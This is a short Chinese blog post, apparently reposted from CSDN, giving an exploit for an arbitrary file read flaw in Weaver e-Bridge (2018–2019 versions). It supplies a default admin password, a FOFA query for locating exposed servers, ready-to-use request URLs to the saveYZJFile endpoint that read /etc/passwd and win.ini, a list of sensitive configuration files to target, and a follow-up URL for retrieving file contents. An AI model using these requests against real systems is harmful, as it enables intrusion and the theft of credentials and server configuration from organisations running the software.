泛微云桥e-Bridge任意文件读取

泛微云桥e-Bridge任意文件读取漏洞

0x00漏洞影响版本:
该漏洞几乎影响2018-2019全版本。
0x01漏洞利用:
默认密码sysadmin/1
fofa搜索语句:title=“泛微云桥”
在这里插入图片描述
在这里插入图片描述
主要成因
/wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件
构造如下语句

http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt

相关敏感文件目录

windows: d://ebridge
linux:/usr/ebridge
etc/passwd
c://windows/win.ini
d://ebridge/tomcat/conf/server.xml
d://ebridge/mysql/my.ini d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties 

获取id值
在这里插入图片描述
在这里插入图片描述

通过id值获取文件内容

http://x.x.x.x/file/fileNoLogin/cf1b577f21ad41199b82d983c89bfd05

在这里插入图片描述
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_44146996/article/details/110290574